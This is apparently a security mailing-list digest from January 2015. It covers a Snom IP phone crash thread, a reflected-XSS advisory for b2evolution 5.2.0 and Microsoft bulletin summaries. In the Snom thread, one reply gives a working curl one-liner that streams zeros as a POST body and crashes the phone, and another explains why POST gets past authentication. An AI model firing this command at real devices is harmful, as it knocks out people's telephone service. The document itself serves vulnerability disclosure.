Posted by kapejod () googlemail com on Jan 13
The latest version is 8.7.3.25.9, there is no 8.7.4.X, yet.
And yes, you missed something, (without the quotes) ” –data-binary @-“
This turns it into a HTTP POST request and uses the input from stdin.
Otherwise you just do a regular HTTP GET which gets blocked because it’s
not authenticated.
On Mon, Jan 12, 2015 at 10:20 PM, Martin Schuhmacher <broetchen25 () gmx net>
wrote:
Posted by Max Mühlbronner on Jan 13
Hi,
it works fine for me:
dd if=/dev/zero bs=1M count=32 | curl http://SNOMIP –data-binary @-
Phone crashes after just a few seconds.
Best Regards
Max M.
Posted by Steffen Rösemann on Jan 13
Advisory: Reflecting XSS vulnerability in CMS filemanager of b2evolution v.
5.2.0
Advisory ID: SROEADV-2014-09
Author: Steffen Rösemann
Affected Software: CMS b2evolution v. 5.2.0 (Release-Date: 6th-Dec-2014)
Vendor URL: http://b2evolution.net/
Vendor Status: did not respond to issue
CVE-ID: –
==========================
Vulnerability Description:
==========================
The filemanager of b2evolution v. 5.2.0 is prone to reflecting XSS…
Revision Note: V1.0 (January 13, 2015): Bulletin Summary published.
Summary: This bulletin summary lists security bulletins released for January 2015.
Severity Rating: Important
Revision Note: V1.0 (January 13, 2015): Bulletin published.
Summary: This security update resolves one privately reported vulnerability in Microsoft Windows. The vulnerability could allow elevation of privilege if an attacker runs a specially crafted application on an affected system. An attacker must have valid logon credentials and be able to log on locally to exploit the vulnerability.
Severity Rating: Important
Revision Note: V1.0 (January 13, 2015): V1.0 (January 13, 2015): Bulletin published.
Summary: This security update resolves a publicly disclosed vulnerability in the Microsoft Windows. The vulnerability could allow elevation of privilege if an attacker logs on to the system and runs a specially crafted application. A local attacker who successfully exploited this vulnerability could run arbitrary code on a target system with elevated privileges. An attacker must have valid logon credentials and be able to log on locally to exploit the vulnerability.
Severity Rating: Important
Revision Note: V1.0 (January 13, 2015): Bulletin published.
Summary: This security update resolves a privately reported vulnerability in Windows Error Reporting (WER). The vulnerability could allow security feature bypass if successfully exploited by an attacker. An attacker who successfully exploited this vulnerability could gain access to the memory of a running process. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.
Severity Rating: Important
Revision Note: V1.0 (January 13, 2015): V1.0 (January 13, 2015): Bulletin published.
Summary: This security update resolves a privately reported vulnerability in Microsoft Windows. The vulnerability could allow security feature bypass by unintentionally relaxing the firewall policy and/or configuration of certain services when an attacker on the same network as the victim spoofs responses to DNS and LDAP traffic initiated by the victim.
Severity Rating: Critical
Revision Note: V1.0 (January 13, 2015): V1.0 (January 13, 2015): Bulletin published.
Summary: This security update resolves a privately reported vulnerability in Microsoft Windows. The vulnerability could allow remote code execution if an attacker sends specially crafted packets to an affected Windows server. Only customers who enable this service are vulnerable. By default, Telnet is installed but not enabled on Windows Server 2003. Telnet is not installed by default on Windows Vista and later operating systems.
Severity Rating: Important
Revision Note: V1.0 (January 13, 2015): Bulletin published
Summary: This security update resolves a privately reported vulnerability in Microsoft Windows. The vulnerability could allow denial of service on an Internet Authentication Service (IAS) or Network Policy Server (NPS) if an attacker sends specially crafted username strings to the IAS or NPS. Note that the denial of service vulnerability would not allow an attacker to execute code or to elevate user rights; however, it could prevent RADIUS authentication on the IAS or NPS.